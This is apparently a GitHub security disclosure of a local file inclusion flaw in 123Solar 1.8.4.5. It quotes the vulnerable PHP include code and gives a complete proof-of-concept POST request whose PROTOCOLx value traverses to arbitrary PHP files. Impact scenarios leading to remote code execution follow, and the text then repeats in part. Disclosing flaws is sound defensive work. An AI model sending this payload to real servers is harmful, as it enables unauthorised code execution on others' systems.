123Solar is a lightweight set of PHP/JS files that makes a web logger to monitor your photovoltaic inverter(s). It just need a web server and PHP, no databases are even needed. The philosophy is: To keep it simple, fast, with a low foot print to run on cheap and low powered devices.
Version 1.8.4.5 of 123Solar is affected by a Local File Inclusion (LFI) vulnerability. Attackers can manipulate the PROTOCOLx parameter to include arbitrary PHP files from unintended directories, potentially leading to remote code execution (RCE).
Details
The following code snippet from /admin/admin_invt2.php is responsible for processing the PROTOCOLx parameter:
if (!empty($_POST['PROTOCOLx']) && is_string($_POST['PROTOCOLx'])) {
$PROTOCOLx = htmlspecialchars($_POST['PROTOCOLx'], ENT_QUOTES, 'UTF-8');
} else {
$PROTOCOLx = 'aurora';
}
...
// Later in the code, the value of $PROTOCOLx is used to include a file:
include "../scripts/protocols/$PROTOCOLx.php";
The PROTOCOLx parameter is intended to specify the communication protocol file name. However, due to insufficient sanitization of the input, it is possible for an attacker to include arbitrary PHP files from unintended directories by manipulating the PROTOCOLx parameter.
POC
POST /admin/admin_invt2.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 915
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Host: your-ip
Connection: Keep-alive
ADRx=2&ARRAY1_POWERx=2300&ARRAY2_POWERx=2300&ARRAY3_POWERx=0&ARRAY4_POWERx=0&AWPOOLINGx=5&COMOPTIONx=-Y3&CORRECTFACTORx=1&DIGESTMAILx=30&EMAILx=testing%40example.com&EXPECTAPRx=420&EXPECTAUGx=415&EXPECTDECx=60.5&EXPECTFEBx=125&EXPECTJANx=72.5&EXPECTJUIx=497&EXPECTJUNx=495&EXPECTMARx=288&EXPECTMAYx=484&EXPECTNOVx=89&EXPECTOCTx=199&EXPECTSEPx=313&FILTERx=W011%2CW001%2CE011&ILEAKTx=15&INVNAMEx=East%20side&LOGCOMx=true&LOGMAWx=true&MAILWx=true&NORESPMx=true&PANELS1x=10%20Aleo%20S_18%20230W%20Orientation:%2090%C2%B0%2C%20Pente:%2045%C2%B0&PANELS2x=10%20Aleo%20S_18%20230W%20Orientation:%2090%C2%B0%2C%20Pente:%2045%C2%B0&PASSOx=9999999&PHASEx=true&PLANT_POWERx=4600&POAKEYx=1&PORTx=/dev/solar&POUKEYx=qeNtfPNC&PROTOCOLx=../../config/[filename]&SENDALARMSx=true&SENDMSGSx=true&SKIPMONITORINGx=1&SRx=1&SYNCx=true&TLGRCIDx=1&TLGRTOKx=1&VGRIDTx=250&YINTERVALx=1000&YMAXx=4500&bntsubmit=Test%20communication&invt_numx=1
Impact
The impact of this vulnerability is primarily the ability to include and execute PHP files on the server. Possible attack scenarios include:
An attacker uploads a PHP file to another system and obtains its absolute path but cannot directly access it. The attacker can then execute the PHP file through this vulnerability.
A PHP code injection vulnerability is discovered, but the configuration file cannot be directly accessed. The attacker can execute the PHP code through this vulnerability.
Hebing123
commented
5 days ago
Summary
Version 1.8.4.5 of 123Solar is affected by a Local File Inclusion (LFI) vulnerability. Attackers can manipulate the PROTOCOLx parameter to include arbitrary PHP files from unintended directories, potentially leading to remote code execution (RCE).
Details
The following code snippet from
/admin/admin_invt2.phpis responsible for processing thePROTOCOLxparameter:The PROTOCOLx parameter is intended to specify the communication protocol file name. However, due to insufficient sanitization of the input, it is possible for an attacker to include arbitrary PHP files from unintended directories by manipulating the PROTOCOLx parameter.
POC
Impact
The impact of this vulnerability is primarily the ability to include and execute PHP files on the server. Possible attack scenarios include: